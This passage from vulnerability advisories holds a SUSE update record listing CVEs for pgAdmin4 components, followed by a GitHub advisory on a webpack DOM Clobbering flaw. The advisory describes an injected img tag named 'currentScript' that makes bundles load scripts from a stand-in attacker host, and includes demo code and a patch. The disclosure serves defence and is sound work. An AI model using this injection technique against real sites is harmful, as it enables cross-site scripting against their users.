SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, ], threats: [ { category: "impact", date: "2024-10-29T12:55:34Z", details: "important", }, ], title: "CVE-2024-4067", }, { cve: "CVE-2024-4068", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2024-4068", }, ], notes: [ { category: "general", text: "The NPM package `braces`, versions prior to 3.0.3, fails to limit the number of characters it can handle, which could lead to Memory Exhaustion. In `lib/parse.js,` if a malicious user sends \"imbalanced braces\" as input, the parsing will enter a loop, which will cause the program to start allocating heap memory without freeing it at any moment of the loop. Eventually, the JavaScript heap limit is reached, and the program will crash.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2024-4068", url: "https://www.suse.com/security/cve/CVE-2024-4068", }, { category: "external", summary: "SUSE Bug 1224256 for CVE-2024-4068", url: "https://bugzilla.suse.com/1224256", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 7.5, baseSeverity: "HIGH", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, ], threats: [ { category: "impact", date: "2024-10-29T12:55:34Z", details: "important", }, ], title: "CVE-2024-4068", }, { cve: "CVE-2024-43788", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2024-43788", }, ], notes: [ { category: "general", text: "Webpack is a module bundler. Its main purpose is to bundle JavaScript files for usage in a browser, yet it is also capable of transforming, bundling, or packaging just about any resource or asset. The webpack developers have discovered a DOM Clobbering vulnerability in Webpack's `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present. Real-world exploitation of this gadget has been observed in the Canvas LMS which allows a XSS attack to happen through a javascript code compiled by Webpack (the vulnerable part is from Webpack). DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes. This issue has been addressed in release version 5.94.0. All users are advised to upgrade. There are no known workarounds for this issue.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2024-43788", url: "https://www.suse.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "SUSE Bug 1229860 for CVE-2024-43788", url: "https://bugzilla.suse.com/1229860", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.5, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, ], threats: [ { category: "impact", date: "2024-10-29T12:55:34Z", details: "moderate", }, ], title: "CVE-2024-43788", }, { cve: "CVE-2024-48948", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2024-48948", }, ], notes: [ { category: "general", text: "The Elliptic package 6.5.7 for Node.js, in its for ECDSA implementation, does not correctly verify valid signatures if the hash contains at least four leading 0 bytes and when the order of the elliptic curve's base point is smaller than the hash, because of an _truncateToN anomaly. This leads to valid signatures being rejected. Legitimate transactions or communications may be incorrectly flagged as invalid.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2024-48948", url: "https://www.suse.com/security/cve/CVE-2024-48948", }, { category: "external", summary: "SUSE Bug 1231681 for CVE-2024-48948", url: "https://bugzilla.suse.com/1231681", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 4.8, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, ], threats: [ { category: "impact", date: "2024-10-29T12:55:34Z", details: "moderate", }, ], title: "CVE-2024-48948", }, { cve: "CVE-2024-48949", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2024-48949", }, ], notes: [ { category: "general", text: "The verify function in lib/elliptic/eddsa/index.js in the Elliptic package before 6.5.6 for Node.js omits \"sig.S().gte(sig.eddsa.curve.n) || sig.S().isNeg()\" validation.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2024-48949", url: "https://www.suse.com/security/cve/CVE-2024-48949", }, { category: "external", summary: "SUSE Bug 1231557 for CVE-2024-48949", url: "https://bugzilla.suse.com/1231557", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 8.2, baseSeverity: "HIGH", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, ], threats: [ { category: "impact", date: "2024-10-29T12:55:34Z", details: "important", }, ], title: "CVE-2024-48949", }, { cve: "CVE-2024-9014", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2024-9014", }, ], notes: [ { category: "general", text: "pgAdmin versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2024-9014", url: "https://www.suse.com/security/cve/CVE-2024-9014", }, { category: "external", summary: "SUSE Bug 1230928 for CVE-2024-9014", url: "https://bugzilla.suse.com/1230928", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 8, baseSeverity: "HIGH", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, ], threats: [ { category: "impact", date: "2024-10-29T12:55:34Z", details: "important", }, ], title: "CVE-2024-9014", }, ], }
ghsa-4vvj-4cpr-p986
Vulnerability from github
Published
2024-08-27 19:50
Modified
2024-09-03 17:09
Severity ?
6.4 (Medium) - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H
6.1 (Medium) - CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N
6.1 (Medium) - CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N
Summary
Webpack's AutoPublicPathRuntimeModule has a DOM Clobbering Gadget that leads to XSS
Details
Summary
We discovered a DOM Clobbering vulnerability in Webpack’s AutoPublicPathRuntimeModule. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.
We found the real-world exploitation of this gadget in the Canvas LMS which allows XSS attack happens through an javascript code compiled by Webpack (the vulnerable part is from Webpack). We believe this is a severe issue. If Webpack’s code is not resilient to DOM Clobbering attacks, it could lead to significant security vulnerabilities in any web application using Webpack-compiled code.
Details
Backgrounds
DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:
[1] https://scnps.co/papers/sp23_domclob.pdf [2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/
Gadgets found in Webpack
We identified a DOM Clobbering vulnerability in Webpack’s AutoPublicPathRuntimeModule. When the output.publicPath field in the configuration is not set or is set to auto, the following code is generated in the bundle to dynamically resolve and load additional JavaScript files:
/******/ /* webpack/runtime/publicPath */
/******/ (() => {
/******/ var scriptUrl;
/******/ if (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + "";
/******/ var document = __webpack_require__.g.document;
/******/ if (!scriptUrl && document) {
/******/ if (document.currentScript)
/******/ scriptUrl = document.currentScript.src;
/******/ if (!scriptUrl) {
/******/ var scripts = document.getElementsByTagName("script");
/******/ if(scripts.length) {
/******/ var i = scripts.length - 1;
/******/ while (i > -1 && (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;
/******/ }
/******/ }
/******/ }
/******/ // When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration
/******/ // or pass an empty string ("") and set the __webpack_public_path__ variable from your code to use your own logic.
/******/ if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser");
/******/ scriptUrl = scriptUrl.replace(/#.*$/, "").replace(/\?.*$/, "").replace(/\/[^\/]+$/, "/");
/******/ __webpack_require__.p = scriptUrl;
/******/ })();
However, this code is vulnerable to a DOM Clobbering attack. The lookup on the line with document.currentScript can be shadowed by an attacker, causing it to return an attacker-controlled HTML element instead of the current script element as intended. In such a scenario, the src attribute of the attacker-controlled element will be used as the scriptUrl and assigned to __webpack_require__.p. If additional scripts are loaded from the server, __webpack_require__.p will be used as the base URL, pointing to the attacker's domain. This could lead to arbitrary script loading from the attacker's server, resulting in severe security risks.
PoC
Please note that we have identified a real-world exploitation of this vulnerability in the Canvas LMS. Once the issue has been patched, I am willing to share more details on the exploitation. For now, I’m providing a demo to illustrate the concept.
Consider a website developer with the following two scripts, entry.js and import1.js, that are compiled using Webpack:
// entry.js
import('./import1.js')
.then(module => {
module.hello();
})
.catch(err => {
console.error('Failed to load module', err);
});
// import1.js
export function hello () {
console.log('Hello');
}
The webpack.config.js is set up as follows: ``` const path = require('path');
module.exports = { entry: './entry.js', // Ensure the correct path to your entry file output: { filename: 'webpack-gadgets.bundle.js', // Output bundle file path: path.resolve(__dirname, 'dist'), // Output directory publicPath: "auto", // Or leave this field not set }, target: 'web', mode: 'development', }; ```
When the developer builds these scripts into a bundle and adds it to a webpage, the page could load the import1.js file from the attacker's domain, attacker.controlled.server. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.
```
Webpack Example```
Impact
This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes.
Patch
A possible patch to this vulnerability could refer to the Google Closure project which makes itself resistant to DOM Clobbering attack: https://github.com/google/closure-library/blob/b312823ec5f84239ff1db7526f4a75cba0420a33/closure/goog/base.js#L174
/******/ /* webpack/runtime/publicPath */
/******/ (() => {
/******/ var scriptUrl;
/******/ if (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + "";
/******/ var document = __webpack_require__.g.document;
/******/ if (!scriptUrl && document) {
/******/ if (document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT') // Assume attacker cannot control script tag, otherwise it is XSS already :>
/******/ scriptUrl = document.currentScript.src;
/******/ if (!scriptUrl) {
/******/ var scripts = document.getElementsByTagName("script");
/******/ if(scripts.length) {
/******/ var i = scripts.length - 1;
/******/ while (i > -1 && (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;
/******/ }
/******/ }
/******/ }
/******/ // When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration
/******/ // or pass an empty string ("") and set the __webpack_public_path__ variable from your code to use your own logic.
/******/ if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser");
/******/ scriptUrl = scriptUrl.replace(/#.*$/, "").replace(/\?.*$/, "").replace(/\/[^\/]+$/, "/");
/******/ __webpack_require__.p = scriptUrl;
/******/ })();
Please note that if we do not receive a response from the development team within three months, we will disclose this vulnerability to the CVE agent.
{ affected: [ { package: { ecosystem: "npm", name: "webpack", }, ranges: [ { events: [ { introduced: "5.0.0-alpha.0", }, { fixed: "5.94.0", }, ], type: "ECOSYSTEM", }, ], }, ], aliases: [ "CVE-2024-43788", ], database_specific: { cwe_ids: [ "CWE-79", ], github_reviewed: true, github_reviewed_at: "2024-08-27T19:50:40Z", nvd_published_at: "2024-08-27T17:15:07Z", severity: "MODERATE", }, details: "### Summary\n\nWe discovered a DOM Clobbering vulnerability in Webpack’s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present.\n\nWe found the real-world exploitation of this gadget in the Canvas LMS which allows XSS attack happens through an javascript code compiled by Webpack (the vulnerable part is from Webpack). We believe this is a severe issue. If Webpack’s code is not resilient to DOM Clobbering attacks, it could lead to significant security vulnerabilities in any web application using Webpack-compiled code.\n\n\n### Details\n\n#### Backgrounds\n\nDOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:\n\n[1] https://scnps.co/papers/sp23_domclob.pdf\n[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/\n\n\n#### Gadgets found in Webpack\n\nWe identified a DOM Clobbering vulnerability in Webpack’s `AutoPublicPathRuntimeModule`. When the `output.publicPath` field in the configuration is not set or is set to `auto`, the following code is generated in the bundle to dynamically resolve and load additional JavaScript files:\n\n```\n/******/ \t/* webpack/runtime/publicPath */\n/******/ \t(() => {\n/******/ \t\tvar scriptUrl;\n/******/ \t\tif (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + \"\";\n/******/ \t\tvar document = __webpack_require__.g.document;\n/******/ \t\tif (!scriptUrl && document) {\n/******/ \t\t\tif (document.currentScript)\n/******/ \t\t\t\tscriptUrl = document.currentScript.src;\n/******/ \t\t\tif (!scriptUrl) {\n/******/ \t\t\t\tvar scripts = document.getElementsByTagName(\"script\");\n/******/ \t\t\t\tif(scripts.length) {\n/******/ \t\t\t\t\tvar i = scripts.length - 1;\n/******/ \t\t\t\t\twhile (i > -1 && (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;\n/******/ \t\t\t\t}\n/******/ \t\t\t}\n/******/ \t\t}\n/******/ \t\t// When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration\n/******/ \t\t// or pass an empty string (\"\") and set the __webpack_public_path__ variable from your code to use your own logic.\n/******/ \t\tif (!scriptUrl) throw new Error(\"Automatic publicPath is not supported in this browser\");\n/******/ \t\tscriptUrl = scriptUrl.replace(/#.*$/, \"\").replace(/\\?.*$/, \"\").replace(/\\/[^\\/]+$/, \"/\");\n/******/ \t\t__webpack_require__.p = scriptUrl;\n/******/ \t})();\n```\n\nHowever, this code is vulnerable to a DOM Clobbering attack. The lookup on the line with `document.currentScript` can be shadowed by an attacker, causing it to return an attacker-controlled HTML element instead of the current script element as intended. In such a scenario, the `src` attribute of the attacker-controlled element will be used as the `scriptUrl` and assigned to `__webpack_require__.p`. If additional scripts are loaded from the server, `__webpack_require__.p` will be used as the base URL, pointing to the attacker's domain. This could lead to arbitrary script loading from the attacker's server, resulting in severe security risks.\n\n### PoC\n\nPlease note that we have identified a real-world exploitation of this vulnerability in the Canvas LMS. Once the issue has been patched, I am willing to share more details on the exploitation. For now, I’m providing a demo to illustrate the concept.\n\nConsider a website developer with the following two scripts, `entry.js` and `import1.js`, that are compiled using Webpack:\n\n```\n// entry.js\nimport('./import1.js')\n .then(module => {\n module.hello();\n })\n .catch(err => {\n console.error('Failed to load module', err);\n });\n```\n\n```\n// import1.js\nexport function hello () {\n console.log('Hello');\n}\n```\n\nThe webpack.config.js is set up as follows:\n```\nconst path = require('path');\n\nmodule.exports = {\n entry: './entry.js', // Ensure the correct path to your entry file\n output: {\n filename: 'webpack-gadgets.bundle.js', // Output bundle file\n path: path.resolve(__dirname, 'dist'), // Output directory\n publicPath: \"auto\", // Or leave this field not set\n },\n target: 'web',\n mode: 'development',\n};\n```\n\nWhen the developer builds these scripts into a bundle and adds it to a webpage, the page could load the `import1.js` file from the attacker's domain, `attacker.controlled.server`. The attacker only needs to insert an `img` tag with the `name` attribute set to `currentScript`. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.\n\n```\n<!DOCTYPE html>\n<html>\n<head>\n <title>Webpack Example</title>\n <!-- Attacker-controlled Script-less HTML Element starts--!>\n 